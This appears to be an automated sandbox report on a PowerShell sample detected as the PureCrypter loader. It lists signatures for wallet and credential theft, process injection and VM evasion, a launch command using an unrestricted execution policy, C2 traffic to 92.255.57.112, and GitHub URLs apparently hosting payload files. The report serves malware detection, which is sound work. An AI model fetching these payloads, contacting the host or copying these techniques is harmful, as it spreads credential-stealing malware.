Edit tour

Windows Analysis Report
92.255.57.112.ps1

Overview

General Information

Sample name:	92.255.57.112.ps1
Analysis ID:	1591628
MD5:	7b7bab781f4b30aee1289f36a01606a0
SHA1:	1b7a8d8302afa6f27f27d3d313865c2a4af61bdd
SHA256:	e82de6b368baabcc81ce3316a319f27173e82b9c2e94a043bf42b62458dc5a98
Tags:	92-255-57-112bookingps1SPAM-ITAuser-JAMESWT_MHT
Infos:

Detection

PureCrypter

Score:	88
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Suricata IDS alerts for network traffic

AI detected suspicious sample

Detected PureCrypter Trojan

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

Queries memory information (via WMI often done to detect virtual machines)

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)

Tries to harvest and steal Bitcoin Wallet information

Writes to foreign memory regions

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sigma detected: Change PowerShell Policies to an Insecure Level

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

powershell.exe (PID: 4088 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\92.255.57.112.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 6528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegSvcs.exe (PID: 5796 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
PureCrypter	According to zscaler, PureCrypter is a fully-featured loader being sold since at least March 2021The malware has been observed distributing a variety of remote access trojans and information stealersThe loader is a .NET executable obfuscated with SmartAssembly and makes use of compression, encryption and obfuscation to evade antivirus software productsPureCrypter features provide persistence, injection and defense mechanisms that are configurable in Googles Protocol Buffer message format	No Attribution	https://any.run/cybersecurity-blog/pure-malware-family-analysis/ https://blog.netlab.360.com/purecrypter-is-busy-pumping-out-various-malicious-malware-families/ https://blog.sekoia.io/mallox-ransomware-affiliate-leverages-purecrypter-in-microsoft-sql-exploitation-campaigns/ https://www.prodaft.com/m/reports/RIG___TLP_CLEAR-1.pdf https://www.zscaler.com/blogs/security-research/technical-analysis-purecrypter	https://malpedia.caad.fkie.fraunhofer.de/details/win.purecrypter

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000003.00000002.4558584705.0000000002AFE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegSvcs.exe PID: 5796	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security

Sigma Signatures

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\92.255.57.112.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\92.255.57.112.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\92.255.57.112.ps1", ProcessId: 4088, ProcessName: powershell.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\92.255.57.112.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\92.255.57.112.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\92.255.57.112.ps1", ProcessId: 4088, ProcessName: powershell.exe

Suricata Signatures

ET MALWARE Generic AsyncRAT Style SSL Cert

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-15T08:24:16.293498+0100	2035595	1	Domain Observed Used for C2 Detected	92.255.57.112	56001	192.168.2.5	49706	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Source:

Binary string: #.dll.pdb source: powershell.exe, 00000000.00000002.2119166269.000001E63C43A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2119166269.000001E63B198000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2148304275.000001E653430000.00000004.08000000.00040000.00000000.sdmp

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2035595 - Severity 1 - ET MALWARE Generic AsyncRAT Style SSL Cert : 92.255.57.112:56001 -> 192.168.2.5:49706

Source: global traffic

TCP traffic: 192.168.2.5:49706 -> 92.255.57.112:56001

Source: Joe Sandbox View

ASN Name: TELSPRU TELSPRU

Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.112
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.112
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.112
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.112
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.112
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.112
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.112
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.112
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.112
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.112
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.112
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.112
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.112
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.112
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.112
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.112
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.112
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.112
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.112
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.112
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.112
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.112
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.112
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.112
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.112
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.112
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.112
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.112
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.112
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.112
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.112
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.112
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.112
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.112
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.112
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.112
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.112
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.112
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.112
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.112
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.112
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.112
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.112
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.112
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.112
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.112
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.112
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.112
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.112
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.112

Source: RegSvcs.exe, 00000003.00000002.4553119445.0000000000D94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: RegSvcs.exe, 00000003.00000002.4572969033.0000000005630000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F8008506.3.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: powershell.exe, 00000000.00000002.2136758256.000001E64B0FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2119166269.000001E63CB42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.2119166269.000001E63C9F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2119166269.000001E63C80C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2146175940.000001E652F70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.2119166269.000001E63AF71000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4558584705.0000000002AFE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.2119166269.000001E63C80C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000000.00000002.2119166269.000001E63C9F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2119166269.000001E63C80C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2146175940.000001E652F70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.2119166269.000001E63AF71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000000.00000002.2119166269.000001E63CB42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.2119166269.000001E63CB42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.2119166269.000001E63CB42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: RegSvcs.exe, 00000003.00000002.4558584705.0000000002AFE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/DFfe9ewf/test3/raw/refs/heads/main/WebDriver.dll
Source: RegSvcs.exe, 00000003.00000002.4558584705.0000000002AFE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/DFfe9ewf/test3/raw/refs/heads/main/chromedriver.exe
Source: RegSvcs.exe, 00000003.00000002.4558584705.0000000002AFE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/DFfe9ewf/test3/raw/refs/heads/main/msedgedriver.exe
Source: powershell.exe, 00000000.00000002.2119166269.000001E63C9F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2119166269.000001E63C80C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2146175940.000001E652F70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.2119166269.000001E63C252000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000000.00000002.2136758256.000001E64B0FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2119166269.000001E63CB42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000000.00000002.2119166269.000001E63C80C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000000.00000002.2119166269.000001E63C80C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.orgX
Source: RegSvcs.exe, 00000003.00000002.4558584705.0000000002AFE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: RegSvcs.exe, 00000003.00000002.4558584705.0000000002AFE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: RegSvcs.exe, 00000003.00000002.4558584705.0000000002AFE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354rCannot

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Window created: window name: CLIPBRDWNDCLASS

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FF848F35180	0_2_00007FF848F35180
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FF848F361B9	0_2_00007FF848F361B9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FF849000F9C	0_2_00007FF849000F9C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_010537F7	3_2_010537F7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0673237F	3_2_0673237F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_06730040	3_2_06730040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_06732454	3_2_06732454
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_06732388	3_2_06732388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_06730007	3_2_06730007
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_06731E37	3_2_06731E37
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_06731E2E	3_2_06731E2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_06731F25	3_2_06731F25

Source: classification engine

Classification label: mal88.spyw.evad.winPS1@4/7@0/1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Mutant created: NULL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Mutant created: \Sessions\1\BaseNamedObjects\3e74489724f9
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6528:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mukhjors.re4.ps1

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\92.255.57.112.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskflowdataengine.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cdp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dsreg.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source:

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FF848F34C00 push E8FFFFFFh; iretd	0_2_00007FF848F34C0D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FF848F3BC8C pushad ; iretd	0_2_00007FF848F3BC8D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FF848F300BD pushad ; iretd	0_2_00007FF848F300C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FF848F3A8DC push ebx; retf	0_2_00007FF848F3A8DD

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
